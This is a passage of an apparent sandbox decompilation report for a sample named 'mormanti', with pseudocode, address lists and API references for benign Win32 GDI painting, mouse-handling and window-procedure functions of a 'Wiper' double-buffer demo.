                                                                                                				intOrPtr _t177;
                                                                                                				struct HDC__* _t178;
                                                                                                				int _t180;
                                                                                                				intOrPtr _t181;
                                                                                                				void* _t187;
                                                                                                				void* _t188;
                                                                                                				long long* _t189;
                                                                                                				long long* _t190;
                                                                                                				void* _t208;
                                                                                                
                                                                                                				_push(0x10c);
                                                                                                				E00C130B8(E00C1339A, __ebx, __edi, __esi);
                                                                                                				GetClientRect( *(_t187 + 8), _t187 - 0x28);
                                                                                                				_t177 =  *((intOrPtr*)(_t187 - 0x1c));
                                                                                                				_t180 =  *(_t187 - 0x24);
                                                                                                				 *((intOrPtr*)(_t187 - 0x10)) =  *((intOrPtr*)(_t187 - 0x20)) -  *(_t187 - 0x28);
                                                                                                				asm("fild dword [ebp-0x10]");
                                                                                                				 *((intOrPtr*)(_t187 - 0x10)) = _t177 - _t180;
                                                                                                				 *((long long*)(_t187 - 0x38)) = __fp0;
                                                                                                				_t104 =  *0xc16050; // 0x177
                                                                                                				asm("fild dword [ebp-0x10]");
                                                                                                				 *((long long*)(_t187 - 0x40)) = __fp0;
                                                                                                				asm("fchs");
                                                                                                				asm("fxch st0, st1");
                                                                                                				_t208 = st1 - st2;
                                                                                                				asm("fild dword [0xc16050]");
                                                                                                				if(_t104 < 0) {
                                                                                                					_t208 = _t208 +  *0xc14438;
                                                                                                				}
                                                                                                				asm("fdivp st1, st0");
                                                                                                				asm("fimul dword [0xc165a8]");
                                                                                                				asm("faddp st1, st0");
                                                                                                				_t105 = E00C13140(_t104, _t208);
                                                                                                				 *(_t187 - 0x14) = _t105;
                                                                                                				asm("fiadd dword [ebp-0x14]");
                                                                                                				 *(_t187 - 0x50) = _t105;
                                                                                                				 *(_t187 - 0x4c) = _t180;
                                                                                                				_t181 = E00C13140(_t105, _t208);
                                                                                                				 *((intOrPtr*)(_t187 - 0x44)) = _t177;
                                                                                                				_t178 =  *(_t187 + 0xc);
                                                                                                				 *((intOrPtr*)(_t187 - 0x48)) = _t181;
                                                                                                				 *((intOrPtr*)(_t187 - 0x10)) = 0x99ff;
                                                                                                				if( *0xc1603c != 0) {
                                                                                                					_t178 = E00C11271( *(_t187 + 8));
                                                                                                					 *((intOrPtr*)(_t187 - 0x10)) = 0x8e48;
                                                                                                				}
                                                                                                				FillRect(_t178, _t187 - 0x28, GetStockObject(0));
                                                                                                				 *(_t187 - 0x18) = CreateRectRgnIndirect(_t187 - 0x28);
                                                                                                				asm("cdq");
                                                                                                				_t160 = 3;
                                                                                                				_t114 = (_t181 -  *(_t187 - 0x14)) / _t160;
                                                                                                				 *((intOrPtr*)(_t187 - 0x6c)) =  *((intOrPtr*)(_t187 - 0x44));
                                                                                                				 *(_t187 - 0x64) =  *(_t187 - 0x4c);
                                                                                                				_t117 =  *((intOrPtr*)(_t187 - 0x20));
                                                                                                				 *((intOrPtr*)(_t187 - 0x60)) = _t117;
                                                                                                				 *((intOrPtr*)(_t187 - 0x58)) = _t117;
                                                                                                				 *((intOrPtr*)(_t187 - 0x54)) =  *((intOrPtr*)(_t187 - 0x1c));
                                                                                                				 *(_t187 - 0x70) =  *(_t187 - 0x14) + _t114;
                                                                                                				 *((intOrPtr*)(_t187 - 0x68)) = _t181 - _t114;
                                                                                                				 *(_t187 - 0x5c) =  *(_t187 - 0x24);
                                                                                                				_t120 = CreatePolygonRgn(_t187 - 0x70, 4, 1);
                                                                                                				 *(_t187 - 0x14) = _t120;
                                                                                                				CombineRgn( *(_t187 - 0x18),  *(_t187 - 0x18), _t120, 4);
                                                                                                				 *(_t187 - 0x2c) = SaveDC( *(_t187 + 0xc));
                                                                                                				SelectObject(_t178,  *0xc165c0);
                                                                                                				SelectObject(_t178, GetStockObject(0));
                                                                                                				_t189 = _t188 - 0x10;
                                                                                                				 *((long long*)(_t189 + 8)) =  *((long long*)(_t187 - 0x40));
                                                                                                				 *_t189 =  *((long long*)(_t187 - 0x38));
                                                                                                				_t128 = E00C1186A(0xc165f4);
                                                                                                				_t190 = _t189 + 0xc;
                                                                                                				 *((long long*)(_t190 + 8)) =  *((long long*)(_t187 - 0x40));
                                                                                                				 *_t190 =  *((long long*)(_t187 - 0x38));
                                                                                                				E00C1186A(0xc16610, _t178,  *(_t187 - 0x18), (_t128 & 0xffffff00 |  *0xc1603d == 0x00000000) & 0x000000ff, _t178,  *(_t187 - 0x14),  *0xc1603d & 0x000000ff);
                                                                                                				RestoreDC( *(_t187 + 0xc),  *(_t187 - 0x2c));
                                                                                                				DeleteObject( *(_t187 - 0x14));
                                                                                                				DeleteObject( *(_t187 - 0x18));
                                                                                                				E00C116A2(E00C119A1(_t187 - 0x50, _t178,  *((intOrPtr*)(_t187 - 0x10))), (_t181 -  *(_t187 - 0x14)) % _t160,  *((long long*)(_t187 - 0x38)));
                                                                                                				SetBkMode(_t178, 1);
                                                                                                				DrawTextA(_t178, " -  Hold Left Mouse Button down on window to pause screen updates.\n -  Drag with Left Mouse Button to move the Wiper right and left.\n -  Right Click to toggle painting mode.  Wiper color indicates mode:\n        Green:  Paint indirectly using a double buffer\n        Orange: Paint directly to the display", 0xffffffff, _t187 - 0x28, 0);
                                                                                                				_t159 = 3;
                                                                                                				__imp__??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z(GetStockObject, 1);
                                                                                                				 *(_t187 - 4) =  *(_t187 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t187 +  *((intOrPtr*)( *((intOrPtr*)(_t187 - 0x118)) + 4)) - 0x118 + 0x10)) = 0x2000;
                                                                                                				 *((long long*)(_t190 + 0x1c - 0xc + 4)) =  *0xc165b8;
                                                                                                				 *((intOrPtr*)(_t187 +  *((intOrPtr*)( *((intOrPtr*)(_t187 - 0x118)) + 4)) - 0x118 + 0x14)) = GetStockObject;
                                                                                                				_t148 = E00C11EAD(_t159, _t178, DrawTextA,  *0xc1603d);
                                                                                                				__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z(_t187 - 0x110, "FrameRate: ", " FPS");
                                                                                                				E00C11EAD(_t159, _t178, DrawTextA,  *0xc1603d);
                                                                                                				_t150 = _t187 - 0x8c;
                                                                                                				__imp__?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ(_t150, _t148);
                                                                                                				if( *((intOrPtr*)(_t150 + 0x18)) < 0x10) {
                                                                                                					_t151 = _t150 + 4;
                                                                                                					__eflags = _t151;
                                                                                                				} else {
                                                                                                					_t151 =  *(_t150 + 4);
                                                                                                				}
                                                                                                				_t152 = DrawTextA(_t178, _t151, 0xffffffff, _t187 - 0x28, 0x6a);
                                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                                				if( *0xc1603c != 0) {
                                                                                                					_t154 = E00C13140(_t152,  *((long long*)(_t187 - 0x40)));
                                                                                                					_t152 = BitBlt( *(_t187 + 0xc),  *(_t187 - 0x28),  *(_t187 - 0x24), E00C13140(_t154,  *((long long*)(_t187 - 0x38))), _t154, _t178, 0, 0, 0xcc0020);
                                                                                                				}
                                                                                                				 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
                                                                                                				__imp__??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ();
                                                                                                				return E00C13121(_t152);
                                                                                                			}

























                                                                                                0x00c113af
                                                                                                0x00c113b9
                                                                                                0x00c113c5
                                                                                                0x00c113d1
                                                                                                0x00c113d4
                                                                                                0x00c113d7
                                                                                                0x00c113da
                                                                                                0x00c113e1
                                                                                                0x00c113e4
                                                                                                0x00c113e7
                                                                                                0x00c113ec
                                                                                                0x00c113ef
                                                                                                0x00c11404
                                                                                                0x00c11406
                                                                                                0x00c11408
                                                                                                0x00c1140a
                                                                                                0x00c11412
                                                                                                0x00c11414
                                                                                                0x00c11414
                                                                                                0x00c1141a
                                                                                                0x00c1141c
                                                                                                0x00c11422
                                                                                                0x00c11424
                                                                                                0x00c11429
                                                                                                0x00c1142c
                                                                                                0x00c1142f
                                                                                                0x00c11432
                                                                                                0x00c11441
                                                                                                0x00c11443
                                                                                                0x00c11446
                                                                                                0x00c11449
                                                                                                0x00c1144c
                                                                                                0x00c11453
                                                                                                0x00c1145e
                                                                                                0x00c11460
                                                                                                0x00c11460
                                                                                                0x00c11477
                                                                                                0x00c11487
                                                                                                0x00c11491
                                                                                                0x00c11492
                                                                                                0x00c11493
                                                                                                0x00c114a3
                                                                                                0x00c114a9
                                                                                                0x00c114ac
                                                                                                0x00c114af
                                                                                                0x00c114b2
                                                                                                0x00c114b8
                                                                                                0x00c114bb
                                                                                                0x00c114c5
                                                                                                0x00c114c8
                                                                                                0x00c114cb
                                                                                                0x00c114d7
                                                                                                0x00c114dd
                                                                                                0x00c114f9
                                                                                                0x00c114fc
                                                                                                0x00c11504
                                                                                                0x00c11510
                                                                                                0x00c11513
                                                                                                0x00c1151a
                                                                                                0x00c11527
                                                                                                0x00c1152f
                                                                                                0x00c11539
                                                                                                0x00c11543
                                                                                                0x00c11553
                                                                                                0x00c11561
                                                                                                0x00c11570
                                                                                                0x00c11575
                                                                                                0x00c11585
                                                                                                0x00c1158d
                                                                                                0x00c115a7
                                                                                                0x00c115ad
                                                                                                0x00c115b5
                                                                                                0x00c115bb
                                                                                                0x00c115d5
                                                                                                0x00c115f4
                                                                                                0x00c115f8
                                                                                                0x00c11607
                                                                                                0x00c11611
                                                                                                0x00c11618
                                                                                                0x00c1161f
                                                                                                0x00c1162c
                                                                                                0x00c11636
                                                                                                0x00c1163d
                                                                                                0x00c1163d
                                                                                                0x00c11638
                                                                                                0x00c11638
                                                                                                0x00c11638
                                                                                                0x00c1164a
                                                                                                0x00c11652
                                                                                                0x00c1165f
                                                                                                0x00c1166e
                                                                                                0x00c11686
                                                                                                0x00c11686
                                                                                                0x00c1168c
                                                                                                0x00c11696
                                                                                                0x00c116a1

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00C113B9
                                                                                                • GetClientRect.USER32 ref: 00C113C5
                                                                                                • GetStockObject.GDI32(00000000), ref: 00C1146F
                                                                                                • FillRect.USER32 ref: 00C11477
                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 00C11481
                                                                                                • CreatePolygonRgn.GDI32(00000004,00000004,00000001), ref: 00C114CB
                                                                                                • CombineRgn.GDI32(?,?,00000000,00000004), ref: 00C114DD
                                                                                                • SaveDC.GDI32(?), ref: 00C114E6
                                                                                                • SelectObject.GDI32(?), ref: 00C114FC
                                                                                                • GetStockObject.GDI32(00000000), ref: 00C11500
                                                                                                • SelectObject.GDI32(?,00000000), ref: 00C11504
                                                                                                  • Part of subcall function 00C1186A: SaveDC.GDI32(?), ref: 00C11878
                                                                                                  • Part of subcall function 00C1186A: SelectClipRgn.GDI32(?,?), ref: 00C11887
                                                                                                  • Part of subcall function 00C1186A: _invalid_parameter_noinfo.MSVCR90 ref: 00C118A9
                                                                                                  • Part of subcall function 00C1186A: SelectObject.GDI32(?,?), ref: 00C118C6
                                                                                                  • Part of subcall function 00C1186A: Ellipse.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C11928
                                                                                                  • Part of subcall function 00C1186A: Rectangle.GDI32(?,00000000,00000000,00000000,00000000), ref: 00C1197D
                                                                                                  • Part of subcall function 00C1186A: RestoreDC.GDI32(?,?), ref: 00C11996
                                                                                                • RestoreDC.GDI32(?,?), ref: 00C11561
                                                                                                • DeleteObject.GDI32(?), ref: 00C11570
                                                                                                • DeleteObject.GDI32(?), ref: 00C11575
                                                                                                  • Part of subcall function 00C119A1: CreateCompatibleDC.GDI32(?), ref: 00C119BB
                                                                                                  • Part of subcall function 00C119A1: SelectObject.GDI32(?,00000000), ref: 00C119E0
                                                                                                  • Part of subcall function 00C119A1: AlphaBlend.MSIMG32(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 00C11A0C
                                                                                                  • Part of subcall function 00C119A1: DeleteDC.GDI32(?), ref: 00C11A15
                                                                                                  • Part of subcall function 00C116A2: GetTickCount64.KERNEL32 ref: 00C116B1
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00C1158D
                                                                                                • DrawTextA.USER32(?, - Hold Left Mouse Button down on window to pause screen updates. - Drag with Left Mouse Button to move the Wiper right and left. - Right Click to toggle painting mode. Wiper color indicates mode: Green: Paint indirectly using a double buffer ,000000FF,?,00000000), ref: 00C115A7
                                                                                                • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP90(00000003,00000001), ref: 00C115B5
                                                                                                  • Part of subcall function 00C11EAD: __EH_prolog3_catch.LIBCMT ref: 00C11EB4
                                                                                                  • Part of subcall function 00C11EAD: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP90(?,00000000), ref: 00C11F81
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z.MSVCP90 ref: 00C11611
                                                                                                  • Part of subcall function 00C11EAD: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F33
                                                                                                  • Part of subcall function 00C11EAD: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH@Z.MSVCP90(?,?,?,00000014,00C1160C,?,FrameRate: ), ref: 00C11F55
                                                                                                  • Part of subcall function 00C11EAD: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP90(?), ref: 00C11FBB
                                                                                                • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP90(?), ref: 00C1162C
                                                                                                • DrawTextA.USER32(?,-00000004,000000FF,?,0000006A), ref: 00C1164A
                                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00C11652
                                                                                                • BitBlt.GDI32(?,?,?,00000000,00000000,?,00000000,00000000,00CC0020), ref: 00C11686
                                                                                                • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP90 ref: 00C11696
                                                                                                Strings
                                                                                                • FPS, xrefs: 00C115E5
                                                                                                • - Hold Left Mouse Button down on window to pause screen updates. - Drag with Left Mouse Button to move the Wiper right and left. - Right Click to toggle painting mode. Wiper color indicates mode: Green: Paint indirectly using a double buffer , xrefs: 00C115A1
                                                                                                • FrameRate: , xrefs: 00C11601
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: U?$char_traits@$Object$D@std@@D@std@@@std@@SelectV?$allocator@$D@2@@std@@$CreateDeleteRect$?sputc@?$basic_streambuf@DrawRestoreSaveStockText$??0?$basic_stringstream@??1?$basic_string@??6?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?str@?$basic_stringstream@AlphaBlendClientClipCombineCompatibleCount64D?$basic_stringstream@D@2@@2@EllipseFillH_prolog3H_prolog3_catchIndirectModePolygonRectangleTickV01@V?$basic_string@_invalid_parameter_noinfo
                                                                                                • String ID: - Hold Left Mouse Button down on window to pause screen updates. - Drag with Left Mouse Button to move the Wiper right and left. - Right Click to toggle painting mode. Wiper color indicates mode: Green: Paint indirectly using a double buffer $ FPS$FrameRate:
                                                                                                • API String ID: 4093834667-1027468517
                                                                                                • Opcode ID: 69d3e97cb03abbe5c4405062e4239594223c889a0303eaaba0cd614a0c41d1b1
                                                                                                • Instruction ID: d30d96cb1c1ac9b74cbbf6e53ac4d61ea93ce59499565cd6c7905a83bc34e87f
                                                                                                • Opcode Fuzzy Hash: 69d3e97cb03abbe5c4405062e4239594223c889a0303eaaba0cd614a0c41d1b1
                                                                                                • Instruction Fuzzy Hash: 3E913AB1D00218AFDB059FA5EC49BEDBBB4FB0A310F158059F605A22A0DB319A95DF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00C124A9(void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                				signed int _v8;
                                                                                                				struct tagPAINTSTRUCT _v76;
                                                                                                				struct tagRECT _v92;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t20;
                                                                                                				int _t24;
                                                                                                				long _t25;
                                                                                                				void* _t27;
                                                                                                				int _t28;
                                                                                                				signed int _t30;
                                                                                                				int _t31;
                                                                                                				int _t34;
                                                                                                				int _t36;
                                                                                                				signed short _t37;
                                                                                                				int _t42;
                                                                                                				int _t44;
                                                                                                				void* _t50;
                                                                                                				void* _t52;
                                                                                                				void* _t53;
                                                                                                				void* _t54;
                                                                                                				void* _t60;
                                                                                                				void* _t64;
                                                                                                				void* _t68;
                                                                                                				void* _t69;
                                                                                                				signed int _t71;
                                                                                                				unsigned int _t76;
                                                                                                				unsigned int _t77;
                                                                                                				signed int _t78;
                                                                                                				void* _t81;
                                                                                                				struct HWND__* _t83;
                                                                                                				void* _t84;
                                                                                                				intOrPtr _t86;
                                                                                                				void* _t87;
                                                                                                				void* _t90;
                                                                                                				signed int _t93;
                                                                                                				void* _t96;
                                                                                                
                                                                                                				_t95 = (_t93 & 0xfffffff8) - 0x5c;
                                                                                                				_t20 =  *0xc16018; // 0x649a0353
                                                                                                				_v8 = _t20 ^ (_t93 & 0xfffffff8) - 0x0000005c;
                                                                                                				_push(_t68);
                                                                                                				_t86 = _a8;
                                                                                                				_t83 = _a4;
                                                                                                				_t96 = _t86 - 0x113;
                                                                                                				if(_t96 > 0) {
                                                                                                					_t24 = _t86 - 0x200;
                                                                                                					__eflags = _t24;
                                                                                                					if(_t24 == 0) {
                                                                                                						__eflags =  *0xc165dc;
                                                                                                						if( *0xc165dc == 0) {
                                                                                                							L40:
                                                                                                							_t25 = 0;
                                                                                                							__eflags = 0;
                                                                                                							L41:
                                                                                                							_pop(_t84);
                                                                                                							_pop(_t87);
                                                                                                							_pop(_t69);
                                                                                                							return E00C1272C(_t25, _t69, _v8 ^ _t95, _t81, _t84, _t87);
                                                                                                						}
                                                                                                						_t90 = (_a16 & 0x0000ffff) -  *0xc165e8 +  *0xc165f0;
                                                                                                						_t27 = E00C112E2(__fp0, _t83, _t90);
                                                                                                						 *0xc165e8 =  *0xc165e8 + _t27;
                                                                                                						__eflags =  *0xc165e8;
                                                                                                						 *0xc165f0 = _t90 - _t27;
                                                                                                						L39:
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t28 = _t24 - 1;
                                                                                                					__eflags = _t28;
                                                                                                					if(_t28 == 0) {
                                                                                                						SetCapture(_t83);
                                                                                                						_t76 = _a16;
                                                                                                						_t30 = _t76 & 0x0000ffff;
                                                                                                						_t77 = _t76 >> 0x10;
                                                                                                						 *0xc165f0 =  *0xc165f0 & 0x00000000;
                                                                                                						 *0xc165e0 = _t30;
                                                                                                						 *0xc165e4 = _t77;
                                                                                                						 *0xc165e8 = _t30;
                                                                                                						 *0xc165ec = _t77;
                                                                                                						 *0xc165dc = 1;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t31 = _t28 - 1;
                                                                                                					__eflags = _t31;
                                                                                                					if(_t31 == 0) {
                                                                                                						ReleaseCapture();
                                                                                                						 *0xc165dc = 0;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t34 = _t31;
                                                                                                					__eflags = _t34;
                                                                                                					if(_t34 == 0) {
                                                                                                						SetCapture(_t83);
                                                                                                						 *0xc165dd = 1;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t36 = _t34 - 1;
                                                                                                					__eflags = _t36;
                                                                                                					if(_t36 == 0) {
                                                                                                						__eflags =  *0xc165dd;
                                                                                                						if( *0xc165dd != 0) {
                                                                                                							_t37 = _a16;
                                                                                                							GetClientRect(_t83,  &_v92);
                                                                                                							_push(_t37 >> 0x10);
                                                                                                							_t42 = PtInRect( &_v92, _t37 & 0x0000ffff);
                                                                                                							__eflags = _t42;
                                                                                                							if(_t42 != 0) {
                                                                                                								ReleaseCapture();
                                                                                                								_t44 =  *0xc1603c; // 0x1
                                                                                                								__eflags = _t44;
                                                                                                								_t78 = _t71 & 0xffffff00 | _t44 == 0x00000000;
                                                                                                								__eflags = _t44 - _t78;
                                                                                                								if(_t44 != _t78) {
                                                                                                									 *0xc1603c = _t78;
                                                                                                									E00C1122B();
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						 *0xc165dd = 0;
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					__eflags = _t36 != 0xf;
                                                                                                					if(_t36 != 0xf) {
                                                                                                						L28:
                                                                                                						_push(_a16);
                                                                                                						_push(_a12);
                                                                                                						_push(_t86);
                                                                                                						L11:
                                                                                                						_t25 = DefWindowProcW(_t83, ??, ??, ??);
                                                                                                						goto L41;
                                                                                                					}
                                                                                                					L27:
                                                                                                					E00C1122B();
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				if(_t96 == 0) {
                                                                                                					__eflags = _a12 - 0x7db;
                                                                                                					if(_a12 != 0x7db) {
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					__eflags =  *0xc165dc;
                                                                                                					if( *0xc165dc != 0) {
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					E00C11340(_t71, __fp0, _t83);
                                                                                                					goto L39;
                                                                                                				}
                                                                                                				_t50 = _t86 - 1;
                                                                                                				if(_t50 == 0) {
                                                                                                					SetTimer(_t83, 0x7db, 0xd, 0);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				_t52 = _t50 - 1;
                                                                                                				if(_t52 == 0) {
                                                                                                					PostQuitMessage(0);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				_t53 = _t52 - 3;
                                                                                                				if(_t53 == 0) {
                                                                                                					goto L27;
                                                                                                				}
                                                                                                				_t54 = _t53 - 0xa;
                                                                                                				if(_t54 == 0) {
                                                                                                					_push(BeginPaint(_t83,  &_v76));
                                                                                                					_push(_t83);
                                                                                                					E00C113AF(_t68, _t83, _t86, __eflags, __fp0);
                                                                                                					EndPaint(_t83,  &_v76);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				_t60 = _t54 - 5;
                                                                                                				if(_t60 == 0) {
                                                                                                					_t25 = 1;
                                                                                                					goto L41;
                                                                                                				}
                                                                                                				if(_t60 != 0xfd) {
                                                                                                					goto L28;
                                                                                                				}
                                                                                                				_t64 = (_a12 & 0x0000ffff) - 0x68;
                                                                                                				if(_t64 == 0) {
                                                                                                					DialogBoxParamW( *0xc1640c, 0x67, _t83, E00C126F5, 0);
                                                                                                					goto L40;
                                                                                                				}
                                                                                                				if(_t64 == 1) {
                                                                                                					DestroyWindow(_t83);
                                                                                                					goto L40;
                                                                                                				} else {
                                                                                                					_push(_a16);
                                                                                                					_push(_a12);
                                                                                                					_push(0x111);
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}










































                                                                                                0x00c124af
                                                                                                0x00c124b2
                                                                                                0x00c124b9
                                                                                                0x00c124bd
                                                                                                0x00c124bf
                                                                                                0x00c124c8
                                                                                                0x00c124cb
                                                                                                0x00c124cd
                                                                                                0x00c125c8
                                                                                                0x00c125c8
                                                                                                0x00c125cd
                                                                                                0x00c126af
                                                                                                0x00c126b6
                                                                                                0x00c126df
                                                                                                0x00c126df
                                                                                                0x00c126df
                                                                                                0x00c126e1
                                                                                                0x00c126e5
                                                                                                0x00c126e6
                                                                                                0x00c126e7
                                                                                                0x00c126f2
                                                                                                0x00c126f2
                                                                                                0x00c126c2
                                                                                                0x00c126ca
                                                                                                0x00c126d1
                                                                                                0x00c126d1
                                                                                                0x00c126d8
                                                                                                0x00c126de
                                                                                                0x00000000
                                                                                                0x00c126de
                                                                                                0x00c125d3
                                                                                                0x00c125d3
                                                                                                0x00c125d4
                                                                                                0x00c1267a
                                                                                                0x00c12680
                                                                                                0x00c12683
                                                                                                0x00c12686
                                                                                                0x00c12689
                                                                                                0x00c12690
                                                                                                0x00c12695
                                                                                                0x00c1269b
                                                                                                0x00c126a0
                                                                                                0x00c126a6
                                                                                                0x00000000
                                                                                                0x00c126a6
                                                                                                0x00c125da
                                                                                                0x00c125da
                                                                                                0x00c125db
                                                                                                0x00c1266a
                                                                                                0x00c12670
                                                                                                0x00000000
                                                                                                0x00c12670
                                                                                                0x00c125e2
                                                                                                0x00c125e2
                                                                                                0x00c125e3
                                                                                                0x00c1265b
                                                                                                0x00c12661
                                                                                                0x00000000
                                                                                                0x00c12661
                                                                                                0x00c125e5
                                                                                                0x00c125e5
                                                                                                0x00c125e6
                                                                                                0x00c125fe
                                                                                                0x00c12605
                                                                                                0x00c12607
                                                                                                0x00c12618
                                                                                                0x00c1261e
                                                                                                0x00c12625
                                                                                                0x00c1262b
                                                                                                0x00c1262d
                                                                                                0x00c1262f
                                                                                                0x00c12635
                                                                                                0x00c1263a
                                                                                                0x00c1263c
                                                                                                0x00c1263f
                                                                                                0x00c12641
                                                                                                0x00c12643
                                                                                                0x00c12649
                                                                                                0x00c12649
                                                                                                0x00c12641
                                                                                                0x00c1262d
                                                                                                0x00c1264e
                                                                                                0x00000000
                                                                                                0x00c1264e
                                                                                                0x00c125e8
                                                                                                0x00c125eb
                                                                                                0x00c125f2
                                                                                                0x00c125f2
                                                                                                0x00c125f5
                                                                                                0x00c125f8
                                                                                                0x00c1251e
                                                                                                0x00c1251f
                                                                                                0x00000000
                                                                                                0x00c1251f
                                                                                                0x00c125ed
                                                                                                0x00c125ed
                                                                                                0x00000000
                                                                                                0x00c125ed
                                                                                                0x00c124d3
                                                                                                0x00c125a1
                                                                                                0x00c125a8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c125ae
                                                                                                0x00c125b5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c125bc
                                                                                                0x00000000
                                                                                                0x00c125bc
                                                                                                0x00c124db
                                                                                                0x00c124dc
                                                                                                0x00c12596
                                                                                                0x00000000
                                                                                                0x00c12596
                                                                                                0x00c124e2
                                                                                                0x00c124e3
                                                                                                0x00c12581
                                                                                                0x00000000
                                                                                                0x00c12581
                                                                                                0x00c124e9
                                                                                                0x00c124ec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c124f2
                                                                                                0x00c124f5
                                                                                                0x00c12565
                                                                                                0x00c12566
                                                                                                0x00c12567
                                                                                                0x00c12574
                                                                                                0x00000000
                                                                                                0x00c12574
                                                                                                0x00c124f7
                                                                                                0x00c124fa
                                                                                                0x00c12553
                                                                                                0x00000000
                                                                                                0x00c12553
                                                                                                0x00c12501
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00c1250b
                                                                                                0x00c1250e
                                                                                                0x00c12546
                                                                                                0x00000000
                                                                                                0x00c12546
                                                                                                0x00c12511
                                                                                                0x00c1252b
                                                                                                0x00000000
                                                                                                0x00c12513
                                                                                                0x00c12513
                                                                                                0x00c12516
                                                                                                0x00c12519
                                                                                                0x00000000
                                                                                                0x00c12519

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.203178859.0000000000C11000.00000020.00020000.sdmp, Offset: 00C10000, based on PE: true
                                                                                                • Associated: 00000000.00000002.203171800.0000000000C10000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203190376.0000000000C16000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000000.00000002.203195544.0000000000C17000.00000002.00020000.sdmp Download File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c10000_mormanti.jbxd
                                                                                                Similarity
                                                                                                • API ID: Capture$PaintRectReleaseWindow$BeginClientDestroyDialogMessageParamPostProcQuitTimer
                                                                                                • String ID:
                                                                                                • API String ID: 4219887922-0
                                                                                                • Opcode ID: 4bcbdc3f403ab67b0540d227d422c6bf0f12c495759793245856cd1fe825af36
                                                                                                • Instruction ID: c00cb71310d8a6d4bae1097ca9c37d419b06702d130885f312c91dfcdd2cba04
                                                                                                • Opcode Fuzzy Hash: 4bcbdc3f403ab67b0540d227d422c6bf0f12c495759793245856cd1fe825af36
                                                                                                • Instruction Fuzzy Hash: BB51D336008249AFD7259F69AC49BFE3BA9F707741F148019F991D21E8DB248DE0FB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00C11129(intOrPtr _a4, intOrPtr _a8) {
                                                                                                				void* __esi;
                                                                                                				signed int _t21;
                                                                                                				void* _t25;
                                                                                                
                                                                                                				srand(GetTickCount());
                                                                                                				 *0xc165c0 = CreatePen(0, 3, 0);
                                                                                                				 *0xc165c4 = CreateSolidBrush(0xededed);
